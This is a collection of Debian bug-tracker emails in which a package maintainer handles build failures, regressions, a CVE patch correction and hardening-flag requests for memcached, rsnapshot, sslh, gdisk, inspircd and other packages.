Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t

2015-07-20 Thread Guillaume Delacour 
On Mon, 29 Jun 2015 22:40:01 +0200 Guillaume Delacour g...@iroqwa.org
wrote:
  
  This package FTBFS in a clean sid sbuild setup:
  
  t/line-lengths.t . ok
  Timeout.. killing the process
  t/lru-crawler.t .. 
  Failed 126/221 subtests 
 
 Seems to be a random issue that affect other distributions (i'm quite
 sure to have been reproduced at least one time a long time ago, but
 wrongly guess this was my env):
 
 http://forums.famillecollet.com/viewtopic.php?id=3165
 https://code.google.com/p/memcached/issues/detail?id=398
 http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk
 
 I've opened issue on upstream googlecode (as GitHub memcached space
 don't let me create issues) to have his point of view about this issue.

Upstream and i don't reproduce the problem, do you ?
I tried to iterate around 250 times on this test and never reproduce this.

$ while true ; do prove t/lru-crawler.t ; done

If you reproduce it, don't hesitate to give me as much details as
possible to reproduce myself/upstream to fix this issue.

--
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#717451: Backups broken when ssh_args are set

2015-07-19 Thread Guillaume Delacour 
fixed 717451 1.4.0-1
thanks

On Wed, 15 Jul 2015 19:42:21 -0400 Michel synth17+deb-b...@gmail.com
wrote:
 Package: rsnapshot
 Version: 1.3.1-7
 Followup-For: Bug #717451


 Dear Maintainer,

 After upgrading rsnapshot to 1.3.1-7, remote backups still fail. Local
 backups work as expected. The upgrade occurred on 06/24/2015, and every
 remote backup since then have failed. Have been extremely busy and have
 not checked local email, until today. To my surprise, have no remote
 backups since 06/24.



I've pushed the 1.4.0-1 release that fix that kind of problem.
Feel free to reopen if it is not the case.

--
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#686956: incompatible with sslh

2015-07-19 Thread Guillaume Delacour 
reassign 686956 mosh
fixed 686956 1.2.4.95rc2-1
thanks

Hi,

I'm reassigning this bug only to mosh and document the version which
include the binding option.

On Tue, 30 Apr 2013 10:05:21 -0400 Keith Winstein kei...@mit.edu wrote:
 This is fixed in git (adding a new mosh option, --bind-server=ANY) and
 will be in the next release.
 
 On Fri, Sep 7, 2012 at 12:12 PM, chrysn chr...@fsfe.org wrote:
  Package: mosh, sslh
  Severity: minor
 
  mosh can't be used on hosts that hide their ssh services behind sslh.
 
  when connecting to such a host, mosh displays
 
  mosh: Nothing received from server on UDP port 60001.
 
  then:
 
  mosh: Nothing received from server on UDP port 60001. (... s without
  contact)
 
  the problem seems to be caused by the way the ssh connection is
  established in sslh: sslh forwards the connection by creating another
  tcp stream from itself to the ssh server, causing SSH_CONNECTION have
  127.0.0.1 in both source and destination ip fields -- and mosh, when
  started with -s, binds to the address it finds in SSH_CONNECTION.
 
  the mosh server seems to get started with -s automatically (even though
  the client seems to just call mosh-server, it shows up in the process
  list as `mosh-server new -s ...`).
 
 
  several solutions seem feasible, in increasing order of my preference:
 
  * provide a way for the client to specify he doesn't want to use the
`-s` option server-side (fix on mosh side)
  * have a server-side configuration option to turn off the `-s` flag for
the host (better, as it has to be done only once per host) (fix on
mosh side)
  * provide a way to find out the real address (fix on ssh side)
 
 
  as a workaround, i have provided a way around sslh for clients to
  connect directly, but that's not usually what an sslh user wants to do.
 
  -- System Information:
  Debian Release: wheezy/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
  Architecture: amd64 (x86_64)
  Foreign Architectures: i386
 
  Kernel: Linux 3.4-trunk-amd64 (SMP w/2 CPU cores)
  Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
  Shell: /bin/sh linked to /bin/dash
 
  Versions of packages mosh depends on:
  ii  libc6   2.13-35
  ii  libgcc1 1:4.7.1-7
  ii  libio-pty-perl  1:1.08-1+b2
  ii  libprotobuf72.4.1-3
  ii  libstdc++6  4.7.1-7
  ii  libtinfo5   5.9-10



signature.asc
Description: OpenPGP digital signature

Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t

2015-06-29 Thread Guillaume Delacour 
forwarded 789835 https://code.google.com/p/memcached/issues/detail?id=417
thanks

On Wed, 24 Jun 2015 22:02:48 +0100 Dominic Hargreaves d...@earth.li wrote:
 Source: memcached
 Version: 1.4.24-1
 Severity: serious
 Justification: FTBFS

Hi,

 
 This package FTBFS in a clean sid sbuild setup:
 
 t/line-lengths.t . ok
 Timeout.. killing the process
 t/lru-crawler.t .. 
 Failed 126/221 subtests 

Seems to be a random issue that affect other distributions (i'm quite
sure to have been reproduced at least one time a long time ago, but
wrongly guess this was my env):

http://forums.famillecollet.com/viewtopic.php?id=3165
https://code.google.com/p/memcached/issues/detail?id=398
http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk

I've opened issue on upstream googlecode (as GitHub memcached space
don't let me create issues) to have his point of view about this issue.

 
 Cheers,
 Dominic.
 
 



signature.asc
Description: OpenPGP digital signature

Bug#784357: memcached multi instance startup/shutdown broken

2015-05-23 Thread Guillaume Delacour 
On Tue, 05 May 2015 21:02:26 +0300 Albertas Sileika a.sile...@gmail.com wrote:
 Package: memcached
 Version: 1.4.21-1.1
 Severity: normal
 
 Dear Maintainer,

Hi,

 
 
 In wheezy there was possibility to start/stop multiple memcached instance via 
 /etc/init.d/memcached.
 After upgrade to jessie this possibility is lost (without rewriting unit 
 files).

You're absolutely right, we didn't have the time to work on this before the 
release.
For now, I don't see any other possibility than writing another systemd
unit file (but suggestions are welcome).

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#774707: sslh: Installation of sslh breaks xinetd if clients are connected

2015-05-23 Thread Guillaume Delacour 
tags 774707 + moreinfo
thanks

Le mardi 06 janvier 2015 à 15:47 +0100, Fabian Kurz a écrit :
 
 The problem appears to be in line 32 of postinst:
 
 # disable to force user to configure inetd mode
 # and disable if standalone mode
 update-inetd --disable https
 
 This command appears to fail if there are existing connections to any xinetd
 service.

I use update-inetd to enable/disable the sslh service and this utility
seems to (according to description) doesn't support xinetd but the
xinetd depends on it.

Anyway, i've tested this on jessie:

- install xinetd 1:2.3.15-3 (and update-inetd 4.43, by depends)
- enable echo service in /etc/xinetd.d/echo and connect to it
- install sslh 1.16-2, default standalone
- call update-inetd --disable https :

# update-inetd --disable https
# echo test | nc localhost 7
test
^C

My echo session was never disconnected by the removal of sslh and the
xinetd service always listen and accept new connections on 7/tcp.

Can you reproduce the problem on Jessie ?

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#784915: jessie-pu: package rsnapshot/1.3.1-4

2015-05-10 Thread Guillaume Delacour 
Package: release.debian.org
Severity: normal
Tags: jessie
User: release.debian@packages.debian.org
Usertags: pu

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hi,

I've introduced [1] in rsnapshot version 1.3.1-4 a problem which affects
multiple user: when defining custom ssh_args they're not properly
interpreted (erroneously quoted). 
This seems to be introduced by my refresh of the patch 10_space_destdir
[2].

I can propose to fix the first problem by integrating the patch [3] i've
prepared
for a newer release of the package. Upstream has patched [4] rsnapshot
as well.

If this is ok, i can prepare a package for stable.

Thanks in advance.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=717451
[2]: 
http://sources.debian.net/src/rsnapshot/1.3.1-4/debian/patches/10_space_destdir.diff/
[3]: 
http://sources.debian.net/src/rsnapshot/1.3.1-6/debian/patches/14_rsync_rsh_quoting.diff/
[4]: https://github.com/rsnapshot/rsnapshot/pull/15

- -- System Information:
Debian Release: stretch/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.13.0-49-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJVT37DAAoJEJmGUYuaqqCl470QAJObTGsO9dcC7Hqv1cCMlf0s
8yJSXf5BfwUeXgydtNsUAvyoN7p2yezAM7+0UmV+7X+Df4cn1mq26EUCqjPDNO/q
tjZmZ1c+GKbC7ft1fT7e5lJKZqJMJhoF5l3gN350AX+QO6kflcsbnt+3lpNRBy16
xyIxXpYLOboXysNuQL9xvyRK9z4N8jFml7kUpDrz2SpcDCErXCPg4G3GCVyQaCPA
jGMIEspbVQkGhF+0U2SJKjdEdb84UhWpaGuAMXpnZmi3f06+VC+lT0eun/F6Jckn
qKNFpSVFjA0ILEVKtue3nkoExso7odl5/sjdfo5kRNs+xTgfL1ZhmTwbilrdQWUi
pNJ9hQc1CaUa2j3oMK9Rr/jipzmV6F+EvBu3DUcSxoaNQYzfdBi+y7ZjcqWrYnx1
tE7KgqJi/wIHSRDG7pWVUt6pzHi/dxAAZ3KYP/Ea+BvQhU5za77qwHiriyKtltFr
05IIVkjuI3XFDwxWA4SqEcYACQzCjI8N3n9dClWkjRddI965wAqiziGPeV+d3M/O
D8Fv04yoh7nFbOzllp8cL67cwppzR+JC33cEYi3tGASikGLra+/QTlF+x+JzLbJZ
pcG9bCDz+pNr8UpCyTjykDCVX3RWeef6uKTgk46A64YbBBtC+qGQHkRZHgfmpuet
WSCMd6DQhGf8rgVfxhrB
=VMO9
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#717451: rsnapshot Backups broken when ssh_args are set

2015-05-10 Thread Guillaume Delacour 
Le dimanche 10 mai 2015 à 03:14 +0200, John Paul Adrian Glaubitz a
écrit :
 Hello!

Hi,

 
 That debdiff is incomplete. The description in the changelog of the
 changes is insufficient and the actual patch is missing as well.
 
 Has this issue been fixed upstream already? If yes, we could just
 cherrypick the patch or upload a new upstream version.

I've asked the release team to include the patch for fixing this issue.
I'm waiting for them to propose the fixed package (but i maybe have to
include it into unstable before).

 
 Cheers,
 Adrian
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#780880: inspircd: CVE-2012-1836 patch incorrect

2015-03-25 Thread Guillaume Delacour 
Le vendredi 20 mars 2015 à 22:05 +, Adam a écrit :
 Package: inspircd
 Version: 2.0.5-1+b1
 Severity: grave
 Tags: security
 Justification: user security hole
 
 Hi,
 
 I am an upstream maintainer for InspIRCd. The patch you have for 
 CVE-2012-1836 (patches/03_CVE-2012-1836.diff) is not the same patch
 we released as part of 2.0.7 (there was no 2.0.6) to address the CVE. It 
 appears to be a a version of this commit: 
 https://github.com/inspircd/inspircd/commit/9aa28f3730fb3dd69c1e06f78bb2bbc43d36c684.
 However this commit was never in a release, and was only in git for about 6 
 days (due to someone other than me pulling it in). I looked at the CVE and 
 addressed it with two followup
 commits later.
 
 This commit and your patch do not fix the problem. You can still send 
 maliciously crafted packets and cause remote code execution. This was fixed
 in 
 https://github.com/inspircd/inspircd/commit/ed28c1ba666b39581adb860bf51cdde43c84cc89,
  prior to the 2.0.7 release.
 
 Furthermore, your patch introduces a buffer underflow where it has i =- 12 
 and not i -= 12. This causes it to start reading from before the packet's 
 buffer. It is unclear
 to me what this can cause.
 
 Additionally, at the same time I commited 
 58c893e834ff20495d007709220881a3ff13f423 to prevent malicious packets from 
 causing InspIRCd to infinite loop. This is not a part of the CVE
 as it does not allow remote code execution, but is still a critical problem 
 due to the potential for denial of service.
 
 You should perhaps apply these two patches on top of your existing ones, or 
 maybe fetch the dns.cpp file off of 2.0.7 here: 
 https://github.com/inspircd/inspircd/blob/v2.0.7/src/dns.cpp.
 It does not change much.
 
 I would be willing to go through and provide a proper set of patches for this 
 and other less-severe issues if requested. I do not want to do it up front 
 because it would be a lot
 of work, and I am not sure whether or not it would be accepted. You have a 
 very, very old InspIRCd version, and there is a lot of stuff to sift through 
 (about 3 years). Let me know.

I'll try to apply diff for src/dns.cpp between the 2.0.5 and 2.0.7
releases as you suggest it and will test (yes i use personally use
inspircd).
When done, i'll contact the Debian security team for an upload in the
security archive.

As the new stable version Debian 8 Jessie is to be freezed/released, i
don't think i'll find a sponsor to upload a 2.0.17 backport of inspircd
for the current Debian 7 Wheezy.

 
 Thanks,
 
 Adam
 



signature.asc
Description: This is a digitally signed message part

Bug#779797: gdisk: Returns exit code 1 after successful operations

2015-03-12 Thread Guillaume Delacour 
severity 779797 serious
thanks

Le mercredi 04 mars 2015 à 21:55 +0100, intrig...@debian.org a écrit :
 Package: gdisk
 Version: 0.8.10-1
 Severity: important
 X-Debbugs-Cc: u...@451f.org
 
 Hi,

Hi,

 
 tl;dr:
 
   * In Wheezy, gdisk correctly returns exit code 0 upon success.
 
   * In Jessie, gdisk mistakenly returns exit code 1 after various
 successful operations. This breaks any tool that uses gdisk for
 such operations... and bothers checking its exit code. No idea if
 the reverse-dependencies in Debian are affected, but it does break
 Tails Installer (not in Debian yet, will be uploaded by the end of
 August) on Jessie.
 
   * This regression has been identified upstream in March, 2014.
 It was fixed in upstream Git back then. It's the HEAD of their
 master branch, and no release was put out since.
 
 The attached patchset imports the fix from upstream (not the entire
 commit, that sadly is non-atomic and contains unrelated changes --
 just the relevant changes), and updates d/changelog accordingly.
 I've generated with git format-patch from the Vcs-Git.

I've also patched gdisk_test.sh to test return code of partition table
creation, like you've made in your test.

 
 The attached reproducer script allows anyone to confirm the summary
 I made above. The results I see on Wheezy, Jessie, and Jessie + the
 upstream fix follow.
 
 With my Tails hat, I'd love to see this bug fixed in Jessie (otherwise
 we'll have to ship a modified gdisk in Tails).
 
 With my Debian hat, I'm unsure. On the one hand, arguably it's not RC,
 and if nobody reported this bug at this stage of the release cycle,
 then it's probably big deal to release with it, and not worth taking
 the risk to modify the package. On the other hand that's a nasty
 regression, and we don't know how many home-made scripts running under
 `set -e' will be broken once their authors upgrade their systems
 to Jessie.
 
 Guillaume, what do you think? If you feel it's RC, please bump
 severity. I can take care of NMU'ing and talking to the release team
 if it helps — just let me know.

I've prepared a fixed version on mentors:
http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc
It would be great if you can upload it to unstable and include it for
Jessie (as i've bumped the severity to serious; i agree with you that
without the upstream fix, it can break user scripts).


-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#779797: gdisk: Returns exit code 1 after successful operations

2015-03-12 Thread Guillaume Delacour 
On Thu, Mar 12, 2015 at 03:08:31PM +0100, intrigeri wrote:
 Hi Guillaume,
 
 Guillaume Delacour wrote (10 Mar 2015 21:51:39 GMT) :
  I've also patched gdisk_test.sh to test return code of partition table
  creation, like you've made in your test.
 
 Great! Now, I don't see this change applied upstream, so it should
 *not* go into the same quilt patch as the one we've cherry-picked
 from upstream. Could you please fix that?

Splitted in two patches.

 
 Also, has this additional change been forwarded upstream yet? DEP-3
 says Any value other than no or not-needed means that the patch
 has been forwarded upstream for the Forwarded field.

The shell script i've submitted upstream a few years ago need to be modified
with redundant if/else blocks. I'm not sure now how to modify all tests to
check return codes. I consider my patch as a non-regression test only for this
bug. This is why i've made the change in this way.

 
  I've prepared a fixed version on mentors:
  http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc
 
 I'm reviewing the one in the Vcs-Git. Hopefully it's the same.
 Note that the main goal of my review is to increase chances the
 resulting package is granted an unblock request.
 
  * Why was the Bug: DEP-3 field, that was in the patch I've
proposed, removed?
  * Are you sure that the trailing comma in the DEP-3 Origin: field
is legit?

I've totally imported your proposal and build a new -2 package.

 
 Other than these few nitpicking comments, it looks good \o/
 
  It would be great if you can upload it to unstable and include it for
  Jessie (as i've bumped the severity to serious; i agree with you that
  without the upstream fix, it can break user scripts).
 
 I'll gladly do that once we agree on the content of the package to
 upload :)
 
 Cheers,
 -- 
 intrigeri

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#628659: [php-maint] Bug#628659: please support IPv6 connections

2015-02-17 Thread Guillaume Delacour 
On Tue, 31 May 2011 12:51:49 +0200 martin f krafft madd...@debian.org wrote:
 forwarded 628659 http://pear.php.net/bugs/bug.php?id=18575
 tags 628659 upstream
 thanks
 
 also sprach Thomas Goirand tho...@goirand.fr [2011.05.31.1105 +0200]:
  While I'm ok to maintain the *package* for php-net-smtp (as being
  part of the pkg-php team), but I wont do any new code on it (just
  eventually fixing issues), especially new features. So best might
  be to send a bug report upstream (there's also a bug tracker at
  pear.php.net), or send a patch (here and upstream).
 
 Done.

The problem was in Net::Socket which is a Net::SMTP dependency.
Anyway the problem was fixed on version 1.0.13 since 2013-05-22 (and Debian has 
now 1.0.14 and i've tested the smtp connection with php-net-smtp which is ok 
with this version).
I'll reassign this bug to php-net-socket and mark it fixed in corresponding 
version.

FYI, Net::Socket use php fsockopen() and it first connect to IPv6 when 
available (not sure how it is managed in the php source code).

 
 -- 
  .''`.   martin f. krafft madduck@d.o  Related projects:
 : :'  :  proud Debian developer   http://debiansystem.info
 `. `'`   http://people.debian.org/~madduckhttp://vcs-pkg.org
   `-  Debian - when you have better things to do than fixing systems
  
 in diving to the bottom of pleasure
  we bring up more gravel than pearls.
-- honoré de balzac



signature.asc
Description: This is a digitally signed message part

Bug#743310: rsnapshot: Program calls with arguments containing quotations mark don't work anymore

2015-02-12 Thread Guillaume Delacour 
Le lundi 09 février 2015 à 23:07 +, Christoph Egger a écrit :
 Package: rsnapshot
 Version: 1.3.1-4
 Followup-For: Bug #743310
 
 Hi!

Hi,

 
 Guess it has something to do with additional quoting. Makes rsnapshot mostly 
 useless for me.

I'm sorry to have introduced such a problem by cherry-picked the
upstream patch; the last known author is about to abandon the
maintenance of rsnapshot (due to inactivity) to other users to fix some
old code base of the software
(https://github.com/bebehei/rsnapshot/issues/1).

I've missed the freeze deadline by trying to update rsnapshot to the
last upstream git repo (there was lots of changes and improvements i
wanted to be done and the project start to be inactive) and it is too
late for this important fix.
I'll try to look further on the take over to see what happen.

 
 /etc/rsnapshot.conf
 # ssh has no args passed by default, but you can specify some here.
 #
 ssh_args-i /root/.ssh/id_rsa_backup
 
 
 /bin/cp -al /srv/rsnapshot/daily.0 /srv/rsnapshot/daily.1 
 /usr/bin/rsync -ax --delete --numeric-ids --relative --delete-excluded \
 --rsh=/usr/bin/ssh -i /root/.ssh/id_rsa_backup \
 user@host:path \
 /srv/rsnapshot/daily.0/entry/ 
 rsync: Failed to exec /usr/bin/ssh -i /root/.ssh/id_rsa_backup: No such file 
 or directory (2)
 rsync error: error in IPC code (code 14) at pipe.c(85) [Receiver=3.1.1]
 rsync: connection unexpectedly closed (0 bytes received so far) [Receiver]
 rsync error: error in IPC code (code 14) at io.c(226) [Receiver=3.1.1]
 
 
 -- System Information:
 Debian Release: 8.0
   APT prefers testing
   APT policy: (500, 'testing')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/dash
 Init: systemd (via /run/systemd/system)
 
 Versions of packages rsnapshot depends on:
 ii  liblchown-perl  1.01-2+b1
 ii  logrotate   3.8.7-1+b1
 ii  perl5.20.1-5
 ii  rsync   3.1.1-2+b1
 
 Versions of packages rsnapshot recommends:
 ii  openssh-client [ssh-client]  1:6.7p1-3
 
 rsnapshot suggests no packages.
 
 -- Configuration Files:
 /etc/cron.d/rsnapshot changed [not included]
 /etc/rsnapshot.conf changed [not included]
 
 -- no debconf information
 



signature.asc
Description: This is a digitally signed message part

Bug#769261: sslh: FTBFS in jessie/i386: Build killed with signal TERM after 150 minutes of inactivity

2014-11-12 Thread Guillaume Delacour 
On Wed, Nov 12, 2014 at 11:41:57AM +0100, Lucas Nussbaum wrote:
 Source: sslh
 Version: 1.16-2
 Severity: serious
 Tags: jessie sid
 User: debian...@lists.debian.org
 Usertags: qa-ftbfs-20141112 qa-ftbfs
 Justification: FTBFS in jessie on i386
 
 Hi,

Hi,

 
 During a rebuild of all packages in jessie (in a jessie chroot, not a
 sid chroot), your package failed to build on i386.
 
 Relevant part (hopefully):

You've missed a relevant part from the build log:

[...]
./sslh-select -v -f -u user --listen localhost:9002 --ssh ::1:9000 --ssl 
::1:9001 -P /tmp/sslh_test.pid
ssh addr: localhost:9000. libwrap service: sshd family 10 10
ssl addr: localhost:9001. libwrap service: (null) family 10 10
listening on:
localhost:9002
localhost:9002
timeout: 2
on-timeout: ssh
listening to 2 addresses
localhost:9002:bind: Address already in use
[...]

Apparently, the bind of localhost:9002 fail on this machine, is there any other 
process listening on this socket ?

  ***Test: One SSL half-started then one SSH
  Connection refused
  ***Test: One SSH half-started then one SSL
  Connection refused
  cat: /tmp/sslh_test.pid: No such file or directory
  killing 
  Can't kill a non-numeric process ID at ./t line 221.
  # Looks like your test exited with 1 before it could output anything.
  make[1]: *** [test] Error 1
  Makefile:99: recipe for target 'test' failed
  make[1]: Leaving directory '/«PKGBUILDDIR»'
  dh_auto_test: make -j1 test returned exit code 2
  make: *** [build] Error 2
  debian/rules:31: recipe for target 'build' failed
  dpkg-buildpackage: error: debian/rules build gave error exit status 2
  Build killed with signal TERM after 150 minutes of inactivity
 
 The full build log is available from:

 http://aws-logs.debian.net/ftbfs-logs/2014/11/12/sslh_1.16-2_jessie-i386.log
 
 A list of current common problems and possible solutions is available at
 http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
 
 About the archive rebuild: The rebuild was done on EC2 VM instances from
 Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
 failed build was retried once to eliminate random failures.

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#767034: sslh has USELIBWRAP off by default

2014-10-27 Thread Guillaume Delacour 
fixed 767034 1.16-1
thanks

Le lundi 27 octobre 2014 à 22:36 +0100, Christian Weinberger a écrit :
 Package: sslh
 Version: 1.13b-3.2
 Severity: important
 
 Dear Maintainer,

Hi,

 
 sslh has USELIBWRAP off by default while openssh-server has libwrap support 
 enabled by default in Debian.
 So sslh default is not in line with the openssh-server default, which is in 
 my eyes not what I expected and therefore a security risk.
 
 Recommendation: Activate USELIBWRAP by default.

USELIBWRAP will be used in the next stable release 1.16-1 (and with
LIBCAP for GNU/Linux):

http://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/rules#n20

 
 
 Best regards,
 Christian
 
 -- System Information:
 Debian Release: 7.7
   APT prefers stable
   APT policy: (600, 'stable'), (500, 'testing'), (50, 'unstable')
 Architecture: amd64 (x86_64)
 Foreign Architectures: i386
 
 Kernel: Linux 3.16-0.bpo.2-amd64 (SMP w/2 CPU cores)
 Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) (ignored: 
 LC_ALL set to de_DE.UTF-8)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages sslh depends on:
 ii  adduser   3.113+nmu3
 ii  debconf   1.5.49
 ii  libc6 2.19-11
 ii  libconfig91.4.8-5
 ii  lsb-base  4.1+Debian8+deb7u1
 ii  update-inetd  4.43
 
 Versions of packages sslh recommends:
 ii  apache2  2.2.22-13+deb7u3
 ii  apache2-mpm-prefork [httpd]  2.2.22-13+deb7u3
 ii  dropbear [ssh-server]2012.55-1.3
 ii  openssh-server [ssh-server]  1:6.0p1-4+deb7u2
 
 Versions of packages sslh suggests:
 ii  xinetd [inet-superserver]  1:2.3.14-7.1+deb7u1
 
 -- Configuration Files:
 /etc/default/sslh changed [not included]
 
 -- debconf information excluded



signature.asc
Description: This is a digitally signed message part

Bug#767039: FTBFS on GNU/Hurd

2014-10-27 Thread Guillaume Delacour 
Package: memcached
Version: 1.4.21-1
Severity: normal

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Just for the record, i tried to fix the FTBFS on GNU/Hurd:
* Temp-declare MAXPATHLEN memcached.c, just to continue the build
* Build finish well but upstream test suite t/stats-conns.t fail on call of
  getpeername(2) on a UNIX domain socket as they're not supported on Hurd
  (pflocal/pf.c, S_socket_whatis_address). Maybe same problem in
  t/unixsocket.t.
  I don't really understand why getpeername is called line 415, as tcp_transport
  is not tcp (need further investigations).

Help (and patches) welcome, work started on 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUTsjcAAoJEJmGUYuaqqClOuYP/jQ575e+Y5jitFvFFLurZ5bC
88Tf11z2/PbguDZF7Q8ZPtc9/yKBBP2/vPyxUHF3RGPjFlV6lsbfPWFPSKAuxAF7
0bzOdjoWEByp68KfjiTImukaRukBPfNxUkOJLdSOAABHxtdPo19XDk4hPt0JU+53
FgM8uYolXNz3hcT7Uphs4+Jnu3G9lpl5i3YrdfnaaqoGi6t1xyDSxdH9mJW7/59U
DuAFKd9bfkKfiD2dFj/D3hDT8sj4FRd+vpdVNZljhwrkvwkT/vx9a5QgrI/r7C1v
f2jqEuwv6ywaImB/QfFLcG/Cj+puc0WwP0bB3qcG3Ig+qu1HP0HW6iydjoQf+wub
s4FOh8p+M9/D2F35WAgY9pAI3zvQJLokCIgo7w49cFtVCvs8/ZQ8P+S/hrdcy3ni
xkyWyI3ADHVG7xufwPp6Zq39BJCGNU0pVb1GGLpILYpi65gKVuiMvvsM4NC/fADF
Rpn7K8YK4rM6nLEorVhlmLUqjhv2uLiMaQFWl1VuNhTcIpDsTf3Bg/DLtD9H04Hg
ikJl4obM2CrSf7jlRaIjxHqiwSvQjChrATNkJozcyEcRODiN5q0luwneKXrSiKjd
GRDBaM4VDnYD/Rr+hmQL49FQTTate2kZa1RlTYj+ge0SNsJGhEitOgLeUIjGf69S
KUojWJB8GQdvi6FS+pk9
=daPC
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#764537: Hardening options incomplete: unapplied FORTIFY_SOURCE

2014-10-08 Thread Guillaume Delacour 
Package: pure-ftpd
Version: 1.0.36-2
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

Hardened build features used through dpkg-buildflags are all used in the
upstream build system (plus bindow and pie).
However, the FORTIFY_SOURCE CPPFLAGS is not applied because gcc optimizations
are not used, see dpkg-buildflags(1) for more informations.
Adding -O2 to CFLAGS in debian/rules seems to be sufficient to enable
fortify_source.

Please also note that blhc report false positives against build flags
because upstream flags are not equals to Debian choices:
* CFLAGS
 + upstream
   -fno-strict-aliasing -fno-strict-overflow -fstack-protector-all
 + dpkg-buildflags:
   -fstack-protector-strong -Wformat -Werror=format-security
* LDFLAGS
 + upstream: -z relro -z now
 + dpkg-buildflags: -Wl,-z,relro -Wl,-z,now

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUNa1mAAoJEJmGUYuaqqClV1gQAIQDA0pnJEISIKAYAXyxLYO4
sEbLSB3v3sTyw+AISR5/RxqoJ7o8mgdUThLEMmCP4qYJqayqdvVUqDH0bcMJ41rM
IiVjdgmu/L5zIyiMHUWWs4LCkhrXQlP6oP8LlEEduuDrMh3dvP4tn7QjrQ1L0SH+
/TLUz+C0brMx6oQ3WVTs5Fowe6/glpNMr2tcIBWCWXjr+KBS1Qjj5JBELM/WcH2G
J49yvWGYAwMOmDB9KbhKUJ8O9z+wnZek2ZI9184099zeVpqPFnQSMHf1iW1PU7Hq
on438lxHN6seqyLKBQkakntcAC/xZeYjUWBAgcRo/xWmhMcCIebM7vBhyUwRU7+b
VUSf2vS5E+4AYsuc00nUp+vTXlDiCihbGLhHG2SPgvvt6EOwVaPXNj8aM9XLnGgE
fagnCBI6yg1WYfUX8nSpyLl5Cmu2LOac+ZiE3JR42UCHMxSWXrEA2CgfFxZy345V
BPPbESk54Xh60+PVIW4qpcqVYpohSkK5CGlfZntikHUCddLcQjCHoScAZGedUGk+
bYX9YA5Y2c1gqBNaJV6s6X/ra4TWrnSIrnQSqkmJ2Iu/FmSG9ck9yWAG7eKNjdN3
SQa5ctVVaF2tNa8D0luLWHEC5QnCty2r+vtdn0aLqxUPNOqhbZnnuGZNnBy11Gi2
WE8nLadeyDs91M6Ic3D8
=va85
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#764409: Hardening options incomplete

2014-10-07 Thread Guillaume Delacour 
Package: open-iscsi
Version: 2.0.873+git0.3b4b4500-4
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

Please consider re-enabling the previous applied
03_hardened-build-flags.patch as open-isci is currently not fully hardened:
missing PIE, relro and bindnow. I've just refreshed the patch to add -fPIC to
the open-isns library (see debdiff attached).

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUNFQlAAoJEJmGUYuaqqClakUP/2aDIgds54yEx9e6sKTmrJbC
ggjcphA1jaI+yxTulMmbfBg3JqtNRC/lYH6FZu7sTnncfcy5CcoSR+fAhEXd5c0Q
C19oT5Y8fFmdBV1w+DgZ9CHZsAdvA+CO+e714WSt7zYnNa+yTSKwJEx3emeRiU3L
zFSb8Gudv/hFKJXxzs9sF3K1ZFiy5NwO0BPf6EFrQbFfb3VQKsVYUpWidnowUkM6
lVC+Ay8PBpwa1WtwvfKbYJ3mCOXCYAQDnK4HqwMW8Rf6U9Vn9F9Qm17nB/VxEgXa
